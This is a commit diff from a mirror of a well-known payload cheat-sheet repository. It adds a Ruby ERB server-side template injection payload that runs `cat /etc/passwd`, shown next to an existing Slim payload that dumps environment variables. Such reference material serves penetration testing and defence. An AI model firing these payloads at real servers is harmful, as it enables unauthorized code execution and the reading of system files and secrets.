mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-21 01:14:13 +00:00
Adding Execute code using SSTI for ERB engine.
This commit is contained in:
parent
04899355ad
commit
7f1fb32980
1 changed files with 7 additions and 1 deletions
|
@ -97,6 +97,12 @@ Execute code using SSTI for Slim engine.
|
|||
#{ %x|env| }
|
||||
```
|
||||
|
||||
Execute code using SSTI for ERB engine.
|
||||
|
||||
```ruby
|
||||
<%= system('cat /etc/passwd') %>
|
||||
```
|
||||
|
||||
## Java
|
||||
|
||||
### Basic injection
|
||||
|
|
Loading…
Reference in a new issue